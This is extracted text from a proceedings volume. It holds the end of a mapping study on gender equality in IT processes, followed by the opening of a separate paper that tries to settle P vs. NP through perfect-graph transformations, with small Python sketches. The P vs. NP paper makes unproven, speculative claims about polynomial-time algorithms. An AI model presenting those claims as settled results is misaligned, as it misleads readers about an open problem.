This SMS is highly relevant both for researchers and professionals in the fields in which it is framed. The results obtained demonstrate the lack of research and developments that address gender equality in and by IT processes, as well as the importance of conducting proposals in this regard. That is why this SMS, in addition to identifying the current state of the art, also highlights the gaps and possible future lines of research and work. The findings obtained can be used by both researchers and professionals who are working in areas such as IT management, gender equality, and social sustainability, among others. Therefore, this SMS is a relevant starting point and a demonstration of the importance of the fields it affects, which we expect will attract new researchers and professionals in the search for gender equality in and by IT processes.
6 Conclusions and Future Work Technology has changed the world as we know it in practically all areas that surround us [3]. However, these changes, far from being perfect, are not always accompanied by positive aspects, as is the case of the gender inequality in IT [4]. That is why this study has focused its goal on analyzing the state of the art on gender equality and IT processes through an SMS. IT processes are the foundations on which all aspects related to IT in organizations are governed and managed [15]. For this reason, it is necessary for them to be sustainable and, in this case, to project exemplary gender equality, diversity, and inclusion towards the entire IT context. Through the results obtained, the novelty of this study has been evidenced, since, of the 4,206 studies found, only 15 studies are related to the established scope. Likewise, the findings achieved identify a series of opportunities and challenges on which it is necessary and urgent to act due to the importance that these fields have together. Therefore, following these findings, as future work we are working on an empirically validated proposal through the development and implementation of an IT process framework that considers all the Targets of the SDG 5 [1] and addresses the challenges identified through a set of egalitarian and inclusive best practices. In this way, we intend to help organizations establish socially sustainable foundations, as well as promote research and practice in these fields. In addition, we also intend to conduct a more indepth evaluation of the results obtained in this study through interviews or surveys with relevant professionals and researchers in the areas of gender equality and IT processes. It is our duty to ensure that the changes in our present positively affect our future and that this future is balanced, diverse, and inclusive for all. Acknowledgments. 
This work is the result of a postdoc from the ERCIM “Alain Bensoussan” Fellowship Program conducted at the Norwegian University of Science and Technology (NTNU). This research is also part of the COST Action - European Network for Gender Balance in Informatics project (CA19122), funded by the Horizon 2020 Framework Program of the European Union.
Appendix A. Selected Studies
S01. Nelson, L. K., Zippel, K.: From Theory to Practice and Back: How the Concept of Implicit Bias Was Implemented in Academe, and What This Means for Gender Theories of Organizational Change. Gender & Society 35(3), 330–357 (2021).
S02. Albusays, K., Bjorn, P., Dabbish, L., Ford, D., Murphy-Hill, E., Serebrenik, A., Storey, M. A.: The Diversity Crisis in Software Development. IEEE Software 38(2), 19–25 (2021).
S03. Biga-Diambeidou, M., Bruna, M. G., Dang, R., Houanti, L. H.: Does gender diversity among new venture team matter for R&D intensity in technology-based new ventures? Evidence from a field experiment. Small Business Economics 56(3), 1205–1220 (2021).
S04. Schmitt, F., Sundermeier, J., Bohn, N., Morassi Sasso, A.: Spotlight on Women in Tech: Fostering an Inclusive Workforce when Exploring and Exploiting Digital Innovation Potentials. In: 2020 International Conference on Information Systems (ICIS 2020), pp. 1–17. AIS, India (2020).
S05. Atal, N., Berenguer, G., Borwankar, S.: Gender diversity issues in the IT industry: How can your sourcing group help? Business Horizons 62(5), 595–602 (2019).
S06. Charlesworth, T. E., Banaji, M. R.: Gender in Science, Technology, Engineering, and Mathematics: Issues, Causes, Solutions. Journal of Neuroscience 39(37), 7228–7243 (2019).
S07. González-González, C. S., García-Holgado, A., Martínez-Estévez, M. A., Gil, M., Martín-Fernandez, A., Marcos, A., Aranda, C., Gershon, T. S.: Gender and Engineering: Developing Actions to Encourage Women in Tech. In: 2018 IEEE Global Engineering Education Conference (EDUCON 2018), pp. 2082–2087. IEEE, Spain (2018).
S08. Diekman, A. B., Steinberg, M., Brown, E. R., Belanger, A. L., Clark, E. K.: A Goal Congruity Model of Role Entry, Engagement, and Exit: Understanding Communal Goal Processes in STEM Gender Gaps. Personality and Social Psychology Review 21(2), 142–175 (2017).
S09. Gorbacheva, E., Stein, A., Schmiedel, T., Müller, O.: The Role of Gender in Business Process Management Competence Supply. Business & Information Systems Engineering 58(3), 213–231 (2016).
S10. Stewart-Williams, S., Halsey, L. G.: Men, women and STEM: Why the differences and what should be done? European Journal of Personality 35(1), 3–39 (2021).
S11. Harvey, V., Tremblay, D. G.: Women in the IT Sector: Queen Bee and Gender Judo Strategies. Employee Responsibilities and Rights Journal 32(4), 197–214 (2020).
S12. Segovia-Pérez, M., Castro Núñez, R. B., Santero Sánchez, R., Laguna Sánchez, P.: Being a woman in an ICT job: An analysis of the gender pay gap and discrimination in Spain. New Technology, Work and Employment 35(1), 20–39 (2020).
S13. Di Tullio, I.: Gender Equality in STEM: Exploring Self-Efficacy Through Gender Awareness. Italian Journal of Sociology of Education 11(3), 226–245 (2019).
S14. LaCosse, J., Sekaquaptewa, D., Bennett, J.: STEM Stereotypic Attribution Bias Among Women in an Unwelcoming Science Setting. Psychology of Women Quarterly 40(3), 378–397 (2016).
S15. Shishkova, E., Kwiecien, N. W., Hebert, A. S., Westphall, M. S., Prenni, J. E., Coon, J. J.: Gender Diversity in a STEM Subfield – Analysis of a Large Scientific Society and Its Annual Conferences. Journal of The American Society for Mass Spectrometry 28(12), 2523–2531 (2017).
Appendix B. Results Mapping Table 5 includes a mapping of the answers of the different selected primary studies with respect to the defined research questions (RQs). Table 5. Data Extraction Results from the Primary Studies ID
Type (RQ1)
Targets (RQ2) Challenges (RQ3)
Best Practices (RQ4)
S01 Others
• Target 5.1 • Target 5.5
• Implicit bias
S02 Others
• Target 5.1 • Target 5.5
• • • •
S03 Others
• Target 5.5
• Gender bias
S04 Validation
• • • •
Target 5.1 Target 5.4 Target 5.5 Target 5.c
• • • • •
Few women Gender bias Retention problems Imposter syndrome Motherhood penalty
• Women workshops
S05 Proposal
• • • •
Target 5.1 Target 5.4 Target 5.5 Target 5.c
• • • •
Recruitment Poor management Retention problems Gender bias
• Nudging
S06 State of the art • • • •
Target 5.1 Target 5.4 Target 5.5 Target 5.c
• Gender bias • Gender preferences • Pay gap
S07 State of the art • Target 5.5
• • • •
Gender bias Code acceptance Disengagement Imposter syndrome
• Habit-breaking
Gender bias Pay gap Retention problems Implicit bias (continued)
S08 Validation
• Target 5.5 • Target 5.b • Target 5.c
• Gender bias • Imposter syndrome • Stereotype threat
• Goal congruity model
S09 Validation
• Target 5.5
• Imposter syndrome
S10 State of the art • Target 5.4 • Target 5.5 • Target 5.c
• Gender preferences • Stereotype threat
S11 Others
• • • •
• Target 5.1 • Target 5.5
Symbolic violence Queen bee syndrome Motherhood penalty Imposter syndrome
S12 State of the art • Target 5.1 • Target 5.5
• Pay gap • Gender-based discrimination • Motherhood penalty • Imposter syndrome
S13 Validation
• Target 5.1 • Target 5.4 • Target 5.5
• Implicit Bias • Self-efficacy • Imposter syndrome
S14 Others
• Target 5.1 • Target 5.5
• • • •
S15 State of the art • Target 5.1 • Target 5.5
• Anti-bias training • Gender blind training
Gender bias Stereotype bias Negative environment Stereotype threat
• Implicit bias
References 1. United Nations: Transforming Our World: The 2030 Agenda for Sustainable Development. In: Seventieth Session of the United Nations General Assembly, Resolution A/RES/70/1. United Nations (UN), USA (2015) 2. Purvis, B., Mao, Y., Robinson, D.: Three pillars of sustainability: in search of conceptual origins. Sustain. Sci. 14(3), 681–695 (2019) 3. Schwab, K.: The Fourth Industrial Revolution. The Crown Publishing Group, USA (2017) 4. Albusays, K., et al.: The diversity crisis in software development. IEEE Softw. 38(2), 19–25 (2021) 5. DuBow, W., Pruitt, A.S.: NCWIT scorecard: the status of women in technology. National Center for Women & Information Technology (NCWIT), USA (2018) 6. Stoet, G., Geary, D.C.: The gender-equality paradox in science, technology, engineering, and mathematics education. Psychol. Sci. 29(4), 581–593 (2018) 7. Glass, J.L., Sassler, S., Levitte, Y., Michelmore, K.M.: What’s so special about STEM? A comparison of women’s retention in STEM and professional occupations. Soc. Forces 92(2), 723–756 (2013)
8. Keohane, N.O.: Women, power & leadership. Daedalus 149(1), 236–250 (2020) 9. Ahinkorah, B.O., et al..: Association between female genital mutilation and girl-child marriage in sub-Saharan Africa. J. Biosoc. Sci. 55(1), 1–12 (2022) 10. Avalos, L., Farrell, N., Stellato, R., Werner, M.: Ending female genital mutilation & child marriage in Tanzania. Fordham Int. Law J. 38(3), 639–700 (2015) 11. Diekman, A.B., Steinberg, M., Brown, E.R., Belanger, A.L., Clark, E.K.: A goal congruity model of role entry, engagement, and exit: understanding communal goal processes in STEM gender gaps. Pers. Soc. Psychol. Rev. 21(2), 142–175 (2017) 12. González Ramos, A.M., Vergés Bosch, N., Martínez García, J.S.: Women in the technology labour market. Revista Española de Investigaciones Sociológicas (REIS) 159, 73–89 (2017) 13. González-González, C.S., et al.: Gender and engineering: developing actions to encourage women in tech. In: 2018 IEEE Global Engineering Education Conference (EDUCON 2018), pp. 2082–2087. IEEE, Spain (2018) 14. de Melo Bezerra, J., et al.: Fostering stem education considering female participation gap. In: 15th International Conference on Cognition and Exploratory Learning in Digital Age (CELDA 2018), pp. 313–316. IADIS, Hungary (2018) 15. ISACA: COBIT 2019 Framework: Governance and Management Objectives. Information Systems Audit and Control Association (ISACA), USA (2018) 16. Kitchenham, B.: Guidelines for Performing Systematic Literature Reviews in Software Engineering (Version 2.3). Keele University, UK (2007) 17. Brereton, P., Kitchenham, B.A., Budgen, D., Turner, M., Khalil, M.: Lessons from applying the systematic literature review process within the software engineering domain. J. Syst. Softw. 80(4), 571–583 (2007) 18. Petersen, K., Feldt, R., Mujtaba, S., Mattsson, M.: Systematic mapping studies in software engineering. In: 12th International Conference on Evaluation and Assessment in Software Engineering (EASE 2008), pp. 68–77. ACM, Italy (2008) 19. 
American Psychological Association: APA Dictionary of Psychology (Second Edition). American Psychological Association, USA (2015) 20. Borokhovski, E., Pickup, D., El Saadi, L., Rabah, J., Tamim, R.M.: Gender and ICT: metaanalysis and systematic review. Commonwealth of Learning, Canada (2018) 21. Yeganehfar, M., Zarei, A., Isfandyari-Mogghadam, A.R., Famil-Rouhani, A.: Justice in technology policy: a systematic review of gender divide literature and the marginal contribution of women on ICT. J. Inf. Commun. Ethics Soc. 16(2), 123–137 (2018) 22. Fox, M.P., Lash, T.L., Bodnar, L.M.: Common misconceptions about validation studies. Int. J. Epidemiol. 49(4), 1392–1396 (2020)
The P vs. NP Problem and Attempts to Settle It via Perfect Graphs State-of-the-Art Approach
Maher Heal1(B), Kia Dashtipour2, and Mandar Gogate2
1 Baghdad University, Jadirayh, Iraq [email protected]
2 School of Computing, Edinburgh Napier University, Merchiston Campus, Edinburgh, UK
Abstract. The P vs. NP problem is a major problem in computer science, perhaps the most celebrated outstanding problem in that domain. Its solution would have a tremendous impact on fields such as mathematics, cryptography, algorithm research, artificial intelligence, game theory, multimedia processing, philosophy, economics and many others. It has remained open for almost 50 years, with attempts concentrated mainly in computational complexity. However, as the problem is tightly coupled with the theory of NP-complete problems, we think the best way to tackle it is to find a polynomial time algorithm for one of the many NP-complete problems. To that end, this work presents attempts at solving the maximum independent set problem of any graph, a well-known NP-complete problem, in polynomial time. The basic idea is to transform any graph into a bipartite, and hence perfect, graph such that either the maximum independent set or the 2nd largest maximal independent set of the transformed graph is twice the size of the maximum independent set of the original graph. There are polynomial time algorithms for finding the independence number or the maximum independent set of perfect graphs. The difficulty, however, lies in finding the 2nd largest maximal independent set of the transformed bipartite perfect graph. Moreover, we characterise the transformed bipartite perfect graph and suggest algorithms to find the maximum independent set for special graphs. We think finding the 2nd largest maximal independent set of bipartite perfect graphs is feasible in polynomial time.
Keywords: P vs. NP · Computational complexity · NP-Complete · Independence number · Perfect graphs
1 Introduction
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023. K. Arai (Ed.): FICC 2023, LNNS 652, pp. 328–340, 2023. https://doi.org/10.1007/978-3-031-28073-3_23
The P vs. NP problem is the most outstanding problem in computer science. Informally, it asks whether there are fast algorithms (P, from polynomial) for problems that only slow algorithms are currently known to solve (NP, from non-deterministic polynomial). To state it more explicitly, we need to define the two problem classes P and NP. The class P is the set of problems for which there are algorithms whose running time is polynomial in the size of the input. The class NP, on the other hand, is the set of problems whose solutions can be verified in polynomial time, even though no polynomial time algorithm for finding a solution may be known. As one example, consider the factorisation of positive integers into primes: while any proposed set of primes is easily verified to be the prime factorisation of a given integer, there is no known easy (polynomial) way to factor the integer into its prime factors, especially when the integer is very large. Another example is a maze with start and destination points. While it is easy to check whether a given path leads from the start point to the destination, finding one is not as easy, and a naive search may need to check an exponential number of paths. Thus, the P vs. NP problem asks whether there are polynomial time algorithms (P-algorithms) for problems whose solutions can be verified in polynomial time but are not known, or not thought, to be found in polynomial time. A formal definition assuming a Turing machine as our computer can be found in the literature, see for example [1–3]. However, we do not need that formal definition, as our approach is graph theoretic and based on the concept of NP-completeness, which we define below. The NP-complete problems are the problems in NP to which any NP problem can be reduced in polynomial time. Accordingly, if one succeeded in finding a P-algorithm for one of the NP-complete problems, then all NP problems could be solved in polynomial time. This is the approach we follow in trying to settle the P vs. NP problem. This work explores solutions to one of the NP-complete problems, namely the maximum independent set problem, by transforming any graph into a perfect graph such that the maximum independent set is encoded in the attributes of the perfect graph. The attribute is either the maximum independent set of the perfect graph, for which polynomial time algorithms are known, or the second largest maximal independent set, for which we try to find a polynomial time algorithm.
This paper is organised as follows: Sect. 2 is a brief review of the literature on the P vs. NP problem and perfect graphs. Section 3 covers the basic transformation of any graph into a perfect graph that we propose. Section 4 explains the possible techniques to extract the maximum independent set of the graph from its transformed perfect graph, together with some properties of that perfect graph. Section 5 contains results for some graphs. Finally, Sect. 6 gives the conclusion and future work.
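The gap between verifying and finding a solution can be illustrated on the independent set problem itself. The following is a minimal sketch, not part of the original work: the function names and the 5-cycle example are assumptions chosen for illustration. Checking a proposed independent set takes time polynomial in the size of the graph, while the naive search shown here enumerates subsets and is exponential in the number of vertices.

```python
from itertools import combinations

def is_independent(edges, candidate):
    """Polynomial-time check: no edge has both endpoints in `candidate`."""
    chosen = set(candidate)
    return not any(u in chosen and v in chosen for u, v in edges)

def max_independent_set_bruteforce(vertices, edges):
    """Exponential-time search: try subsets from the largest size downwards."""
    vertices = list(vertices)
    for size in range(len(vertices), -1, -1):
        for subset in combinations(vertices, size):
            if is_independent(edges, subset):
                return set(subset)
    return set()

# Hypothetical example: a 5-cycle (an odd hole) on the vertices 0..4.
c5_edges = [(i, (i + 1) % 5) for i in range(5)]
best = max_independent_set_bruteforce(range(5), c5_edges)
print(len(best), is_independent(c5_edges, best))
```

The brute-force routine is only meant for very small graphs; it is the kind of exhaustive search that a polynomial time algorithm would have to avoid.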
2 Literature Review
Many attempts have been made to settle the P vs. NP problem, mainly centred around computational complexity. One of the techniques used to try to prove P ≠ NP is relativisation. However, Baker, Gill and Solovay [5] showed that no relativizable proof can settle the P versus NP problem in either direction. Another attempt is based on circuit complexity: to show P ≠ NP we just need to show that some NP-complete problem cannot be solved by relatively small circuits of AND, OR, and NOT gates. However, the results of Furst, Saxe, and Sipser [8] and Razborov [6,7] suggest that this path does not lead to a settlement of the P vs. NP problem. Some researchers relied on proof complexity methods to show P ≠ NP, but as can be seen from the work of Haken [9], this path has not been fruitful either. For other approaches, mainly from computational complexity, that try to show P ≠ NP, one can read the interesting article in Communications of the ACM [4]. Our approach is based on attacking one of the NP-complete problems, namely the maximum independent set problem, and proving that there is, or is not, a polynomial time algorithm to solve it. For that purpose we convert the graph into a perfect graph. Perfect graphs are the graphs in which the chromatic number of every induced subgraph equals the clique number of that induced subgraph. An interesting property of perfect graphs, conjectured by Berge [10] and proved by Chudnovsky et al. [11] (see Maher Heal for simpler polyhedral proofs [12]), is given by the strong perfect graph theorem: a graph is perfect if and only if it is free of odd holes and odd anti-holes. There are many interesting classes of graphs that are perfect, such as bipartite graphs, interval graphs, etc. One useful property of perfect graphs is that there are polynomial time algorithms to find essential graph invariants such as the independence number, clique number and chromatic number [13]. We use this property to try to find solutions to the general problem of finding the independence number and/or a maximum independent set of any graph.
3 Transforming Any Graph into a Perfect Graph
Assume we have an undirected graph G = (V, E), where V is the set of vertices and E is the set of edges. An undirected graph is defined by a set of vertices V and a set of edges that are unordered pairs of vertices, Ei = (vj, vk), Ei ∈ E, vj ∈ V and vk ∈ V. A set of vertices no two of which are connected by an edge is called an independent set or a stable set. If this set cannot be extended by adding more vertices to it while keeping its vertices mutually non-connected, it is called a maximal independent set. The largest of all maximal independent sets is called a maximum independent set. Finding the maximum independent set of a general graph is a well-known NP-complete problem. However, for perfect graphs at least, the maximum independent set can be found in polynomial time [13]. As per the strong perfect graph theorem, a perfect graph is a graph that is free of odd holes and odd anti-holes [11,12]. A hole is a chordless cycle on at least 4 vertices. An anti-hole is the complement of a hole. Odd holes and odd anti-holes are holes and anti-holes, respectively, with an odd number of vertices. See Fig. 1 for an example of an odd hole and an odd anti-hole on 5 vertices. We transform the graph G into a perfect graph T by replacing every vertex a ∈ V by two vertices a and a′. For any two vertices a, b ∈ G, if a is not connected to b then their images a, a′, b, b′ in T are mutually not connected. On the other hand, if a is connected by an edge to b, then a is connected to b′ and a′ is connected to b in the graph T. Under this transformation every odd hole becomes an even hole and every odd anti-hole becomes an even anti-hole; see Fig. 2 and Fig. 3 for an illustration.
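The transformation can be sketched in a few lines. This is a minimal sketch under the assumption that a vertex a of G is encoded as the tuple (a, 0) and its copy a′ as (a, 1); the function name `transform` and the 5-cycle input are illustrative only.

```python
def transform(vertices, edges):
    """Return (T_vertices, T_edges) for the doubled graph T.

    Each vertex a of G becomes (a, 0) for a and (a, 1) for a'.
    Each edge {a, b} of G becomes the two edges a-b' and a'-b of T.
    """
    t_vertices = [(v, side) for v in vertices for side in (0, 1)]
    t_edges = []
    for a, b in edges:
        t_edges.append(((a, 0), (b, 1)))  # a  -- b'
        t_edges.append(((a, 1), (b, 0)))  # a' -- b
    return t_vertices, t_edges

# Hypothetical input: the odd hole on 5 vertices.
c5_vertices = list(range(5))
c5_edges = [(i, (i + 1) % 5) for i in range(5)]
t_vertices, t_edges = transform(c5_vertices, c5_edges)

# Every edge of T joins an unprimed vertex to a primed one, so T is bipartite.
is_bipartite = all(x[1] != y[1] for x, y in t_edges)
print(len(t_vertices), len(t_edges), is_bipartite)
```

Because every edge of T runs between the unprimed and the primed copies, T is bipartite by construction, which is what makes it perfect.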
Fig. 1. (A) An odd hole of size 5. (B) The complement of the odd hole, an anti-hole of size 5; the dashed lines are for the odd hole.
Fig. 2. A graph G, an odd hole (left side), its transformed graph T (middle) and the bipartite graph representation of T (right side).
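For the odd hole of Fig. 2, the independence numbers of G and of its transformed graph T can be compared by exhaustive search. The sketch below assumes the 5-vertex hole and the tuple encoding (a, 0) for a and (a, 1) for a′; it checks the relation α(T) = max(n, 2α(G)) used in Sect. 4 on this single example only and says nothing about other graphs.

```python
from itertools import combinations

def alpha(vertices, edges):
    """Independence number by exhaustive search (small graphs only)."""
    vertices = list(vertices)
    for size in range(len(vertices), 0, -1):
        for subset in combinations(vertices, size):
            chosen = set(subset)
            if not any(u in chosen and v in chosen for u, v in edges):
                return size
    return 0

def transform(vertices, edges):
    """Doubled graph T: edge {a, b} of G gives edges a-b' and a'-b."""
    t_vertices = [(v, side) for v in vertices for side in (0, 1)]
    t_edges = [((a, s), (b, 1 - s)) for a, b in edges for s in (0, 1)]
    return t_vertices, t_edges

n = 5  # assumed size of the odd hole
g_vertices = list(range(n))
g_edges = [(i, (i + 1) % n) for i in range(n)]
t_vertices, t_edges = transform(g_vertices, g_edges)

alpha_g = alpha(g_vertices, g_edges)
alpha_t = alpha(t_vertices, t_edges)
print(alpha_g, alpha_t, max(n, 2 * alpha_g))
```

Here 2α(G) = 4 is smaller than n = 5, so the maximum independent set of T is one side of the bipartition rather than the image of a maximum independent set of G.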
4 Extracting the Independence Number from the Transformed Perfect Graph
If we assume the graph G has n vertices with independence number α(G), then it is easy to see that the independence number of the transformed bipartite graph T is max(n, 2α(G)). So if 2α(G) ≥ n, we have a polynomial time algorithm to find α(G), since α(T) = 2α(G) and there is a polynomial time algorithm to find α(T) because T is perfect. Indeed, if we had a polynomial time algorithm to find the two largest maximal independent sets of any perfect graph, that would mean P = NP.
4.1 Characterisation of the Transformed Graph T
We state here some simple lemmas to characterise the maximal independent set of T that is the image of a maximum independent set in G.
Lemma 1. Starting from any vertex of T as a centre, we can build a tree representation of T such that Δab is constant, where Δab is the shortest distance between vertices a and b, {a, b} ⊆ T. Δab is independent of the tree centre and equals the smallest number of hops (vertices) on a path between a and b, with a and b included.
Fig. 3. A graph G, an odd anti-hole (left side) and its transformed graph T (right side).
Proof. This is a straightforward lemma since ω(T) = 2. Note that Δab is the smallest number of hops (vertices) on a path between a and b, with a and b included; as an example, see Fig. 5. We will use concrete examples to illustrate the different concepts and lemmas later in the text.
Lemma 2. For any vertex v ∈ T, the number of hops between v and v′, i.e. the distance Δvv′, is even and at least 4, i.e. 4, 6, 8, ....
Proof. Since, by the definition of T, the vertices a, b, c, ... are mutually not connected, and likewise the vertices a′, b′, c′, ..., the possible paths from v to v′ are of the form v, r′, s, v′, i.e. Δvv′ is 4, or v, r′, s, u′, m, v′, i.e. Δvv′ is 6, and so on, where v, r′, s, u′, m, v′ are all vertices in T.
Lemma 3. If G is connected, then T is connected if and only if G has an odd loop of 3 or more vertices (which is the case if ω(G) ≥ 3 or if G has an odd hole). If ω(G) = 2 and G contains only even loops (holes), then T = T1 ∪ T2 such that each of the graphs T1 and T2 is connected, but T1 is not connected to T2.
Proof. If G has only even loops, i.e. ω(G) = 2 and there are no odd holes in G, then the number of vertices of each loop is even, say 2n, n = 2, 3, 4, .... The loop is then {1, 2, 3, ..., 2n, 1} and its images in T are the subgraphs {1, 2′, 3, 4′, ..., 2n−1, (2n)′, 1} and {1′, 2, 3′, 4, ..., (2n−1)′, 2n, 1′}; clearly each is connected, but the two are not connected to each other. However, if G contains a loop with an odd number of vertices (i.e. ω(G) ≥ 3, or ω(G) = 2 and G contains an odd hole), say the loop {1, 2, ..., 2n, 2n+1, 1}, n = 1, 2, 3, ..., then the image of that loop in T is {1, 2′, 3, 4′, ..., 2n+1, 1′, 2, 3′, ..., (2n+1)′, 1}, which is clearly an even connected loop. Now assume G is connected and there is an odd loop of 3 or more vertices in G; we show that T for this graph is connected. Let x1 and x2 be two vertices in G, and let x1, x1′ and x2, x2′ be their images in T respectively, see Fig. 4. Let R be an odd loop of 3 or more vertices, and let a, b be two vertices of R such that there is a path from x1 to a and a path from x2 to b; such paths exist since G is connected. It is easy to see that in T there is a path from x1 to a or a′, from x1′ to a or a′, from x2 to b or b′, and from x2′ to b or b′. Since the image of R in T is connected, i.e. there is a path between any two of a, a′, b and b′, there is a path between any two of the vertices x1, x1′, x2 and x2′ in T.
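Lemma 3 can be checked on the two smallest cases. The sketch below is an illustration only, assuming the tuple encoding (a, 0) for a and (a, 1) for a′ and two hypothetical inputs: an even loop on 4 vertices, whose transformed graph should split into two components, and an odd loop on 5 vertices, whose transformed graph should be connected.

```python
from collections import deque

def build_t(edges):
    """Adjacency of T: edge {a, b} of G gives edges a-b' and a'-b."""
    adj = {}
    for a, b in edges:
        for x, y in (((a, 0), (b, 1)), ((a, 1), (b, 0))):
            adj.setdefault(x, set()).add(y)
            adj.setdefault(y, set()).add(x)
    return adj

def count_components(adj):
    """Number of connected components, found by breadth-first search."""
    seen = set()
    components = 0
    for start in adj:
        if start in seen:
            continue
        components += 1
        seen.add(start)
        queue = deque([start])
        while queue:
            x = queue.popleft()
            for y in adj[x]:
                if y not in seen:
                    seen.add(y)
                    queue.append(y)
    return components

def cycle(n):
    """Edge list of a loop on the vertices 0..n-1."""
    return [(i, (i + 1) % n) for i in range(n)]

components_even = count_components(build_t(cycle(4)))
components_odd = count_components(build_t(cycle(5)))
print(components_even, components_odd)
```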
Fig. 4. (A) Graph G that contains at least one odd loop R. (B) An example of graph G. (C) The transformation of the graph G in (B), i.e. graph T.
Lemma 4. The following are true, assuming we have a tree representation of T starting from an arbitrary vertex v as per Lemma 1.
1. Δab = Δa′b′ and Δab′ = Δa′b for any two vertices a and b in T, assuming there is a path between any two of those vertices, such as a, b or a, b′, etc.
2. The vertices on any circle are mutually not connected to each other, where the vertices on a circle are those at a fixed equal distance from the centre v.
3. The vertices on any circle are either all primed, such as r′, s′, t′, ..., or all not primed, such as r, s, t, ....
4. Vertices that belong to adjacent circles are such that all vertices on one of these circles are primed (not primed) and all vertices on the other circle are not primed (primed), respectively.
Proof. All the statements follow directly from the definition of graph T and its symmetry.
Fig. 5. An example of a tree representation of graph T starting at vertex v, Δvx = 4.
Lemma 5. Assume T is represented by a tree with centre v and circles that are 4 hops apart from each other, as in the example in Fig. 5, where the distance between v, circle 1 and circle 2 is 4 hops, i.e. Δvc1 = 4, and note also that Δc1c3 = 4. Let Υ be the set formed by the union of vertex v and the vertices on circles that are 4 hops apart from each other. Then Υ contains at least one member (primed or not primed) of each pair of vertices of a maximal independent set in T, possibly a maximum one, that is the image of a maximal (possibly maximum) independent set in G. That maximal (maximum) independent set in T is formed by extending Υ, taking the vertices in Υ together with their pairs, i.e. we take v, v′, u, u′, s, s′, ... and so on. The case where there are vertices not on circles that are 4 hops apart is discussed at the end of the proof of this lemma.
Proof. We seek the largest maximal independent set in T whose members are pairs such as u, u′, v, v′, s, s′, etc., because this is the image in T of a maximum independent set in G; we call this ‘Υ extension’. Lemma 5 claims that if Υ is the set of all vertices in the tree representation of T that are 4 hops apart, starting from and including v, then Υ contains at least one vertex of each pair forming a maximal (maximum) independent set in T that is the image of a maximal (maximum) independent set in G. To prove this we need to prove the following: (1) the vertices of Υ are not connected to each other; (2) we can extend Υ by adding the pair of any vertex in Υ, and Υ still contains mutually non-connected vertices; and finally (3) Υ cannot be extended beyond what is stated in step 2; we call this extended set ‘Υ extension’. It is clear that (1) is true, since the vertices on any circle are either all primed or all not primed, and since the distance between any vertices on different circles is more than 2. Regarding (2), see Fig. 6, where the numbered vertex labels show the possible locations of a vertex's pair. For example, for A, which is on circle 2 in black, the possible positions of A′ are A1, A2, A3, A4, A5, ..., since Δuu′ = 4, 6, 8, ... for any vertex u. By removing the vertices on the red circles we are left with the set Υ, whose vertices are mutually not connected to each other. By Lemma 4, the vertices added to Υ are also mutually not connected to each other, since we excluded all vertices at distance (Δ) 1 from each other. However, when we have vertices not on circles, i.e. vertices that are not a multiple of 4 hops away from v, we need to consider them separately, as they could be added; for example, if we have vertices on circle 1′ in red and there are no vertices connected to them on circle 2 in black, i.e. when branches terminate in circle 1′ in red. It is easy to see that such a set ‘Υ extension’ cannot be extended further. To account for all maximal independent sets of pairs, we need to change the centre v of the tree by considering all vertices inside circle 2 in black as centres of the tree and repeating the procedure for each one of them; otherwise ‘Υ’ can be extended beyond ‘Υ extension’.
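The distance statements of Lemmas 2 and 4 can be checked numerically with a breadth-first search. The sketch below is illustrative only: the edge list of G is an assumption inferred from the worked example of Sect. 4.3 (Fig. 8), vertices are encoded as (a, 0) for a and (a, 1) for a′, and Δ is counted in vertices with both endpoints included, as in Lemma 1.

```python
from collections import deque

# Assumed edge set of G, inferred from the worked example of Fig. 8.
G_EDGES = [(1, 4), (4, 5), (4, 6), (5, 6), (2, 5), (3, 6)]

def build_t(edges):
    """Adjacency of T: edge {a, b} of G gives edges a-b' and a'-b."""
    adj = {}
    for a, b in edges:
        for x, y in (((a, 0), (b, 1)), ((a, 1), (b, 0))):
            adj.setdefault(x, set()).add(y)
            adj.setdefault(y, set()).add(x)
    return adj

def deltas_from(adj, source):
    """Delta from `source` to every reachable vertex, counted in vertices."""
    hops = {source: 1}
    queue = deque([source])
    while queue:
        x = queue.popleft()
        for y in adj[x]:
            if y not in hops:
                hops[y] = hops[x] + 1
                queue.append(y)
    return hops

T = build_t(G_EDGES)

# Lemma 2: the distance between v and v' is even and at least 4.
pair_distances = {v: deltas_from(T, (v, 0))[(v, 1)] for v in range(1, 7)}

# Lemma 4, item 3: every circle around the centre is all primed or all unprimed.
circles = {}
for vertex, d in deltas_from(T, (1, 0)).items():
    circles.setdefault(d, set()).add(vertex[1])
circles_uniform = all(len(sides) == 1 for sides in circles.values())

print(pair_distances, circles_uniform)
```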
4.2 Algorithms to Find the Independence Number for Special Graphs
Algorithm I. Assume the maximum independent set of graph G has a vertex that belongs only to it; then an algorithm to find it is as follows. Using the tree representation of T, as in Fig. 7, start from some arbitrary vertex v (this is to be repeated for all vertices) and assign 1 to v and v′. Move from v and v′ to all their neighbours, which are assigned 0, and keep moving (tracing the graph), assigning 1 to the neighbours of the neighbours N(v, v′) of v and v′ (for example v(1) → p′(0) → q(1) → ..., v′(1) → p(0) → q′(1) → ...). However, if any vertex assignment results in adjacent vertices being assigned 1, then we assign that vertex 0. The algorithm is depicted in Algorithm 1. Since the maximum independent set in G has a vertex that belongs only to it, we are sure to end in a maximum independent set of G, since we start from a different vertex in each run of the algorithm and exhaust all the vertices.
Fig. 6. An Example of Graph T and its Tree Representation Starting from Vertex v and the Different Combinations to Find Maximum Maximal Independent Set of Pairs.
Algorithm II. Another algorithm, keeping the same assumption as the previous section, is as follows. Starting from any vertex u, we assign 1 to u and u′; all vertices one hop away from u and u′, i.e. the neighbours N(u, u′) of u and u′, are assigned 0. We then take another vertex r, different from u, u′ and N(u, u′), and assign 1 to it and to r′; all vertices connected to r, r′, i.e. N(r, r′), are assigned 0. If that is not possible, i.e. we have a conflict because two adjacent vertices would have to be assigned 1 while they (or at least one of them) were already assigned 0, then r and r′ are assigned 0. We repeat this until we exhaust all vertices. Then we repeat the same procedure all over again, taking a vertex different from u as the starting vertex. The procedure is repeated with every vertex as a starting point. If we assume there are 2n vertices in T, then we need to repeat the procedure n times, once per starting vertex, and for every starting vertex we need to check at most 2n·2n pairs. Hence the worst case is O(n³) operations. Accordingly, under the stated assumption, we have a P-algorithm to find a maximum independent set. This can be confirmed by noting that the procedure converges to a maximal independent set, and since there is one vertex that belongs only to a maximum independent set and we repeat the procedure taking all the vertices in T one by one as starting points, we must converge to a maximum maximal independent set in T, which is the image of a maximum independent set in G.
